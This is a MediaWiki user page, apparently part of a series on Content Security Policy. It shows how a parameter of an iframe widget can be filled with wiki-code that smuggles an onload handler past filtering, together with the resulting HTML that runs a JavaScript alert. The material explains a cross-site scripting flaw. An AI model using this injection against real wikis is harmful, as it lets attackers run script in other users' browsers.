MediaWiki

User:BWolff (WMF)/CSP/4

< User:BWolff (WMF) | CSP

Example

edit

For example:

The iframe widget is defined as: 

<includeonly><iframe src="<!--{$url|validate:url}-->" style="border: <!--{$border|escape:html|default:0}-->" width="<!--{$width|escape:html|default:400}-->" height="<!--{$height|escape:html|default:300}-->"></iframe></includeonly>

If we have the wiki-code 

{{#widget:iframe|width=0|height=0|url=https://example.com/"onl{{safesubst:ns:0}}oad="alert('All\40your\40base\40are\40belong\40to\40us')}}

Results in the HTML: 

<p><iframe src="https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')" style="border: 0" width="0" height="0"></iframe>
</p>

Which causes All your base are belong to us to show up in a pop-up box.

next

Retrieved from "https://www.mediawiki.org/w/index.php?title=User:BWolff_(WMF)/CSP/4&oldid=3175453"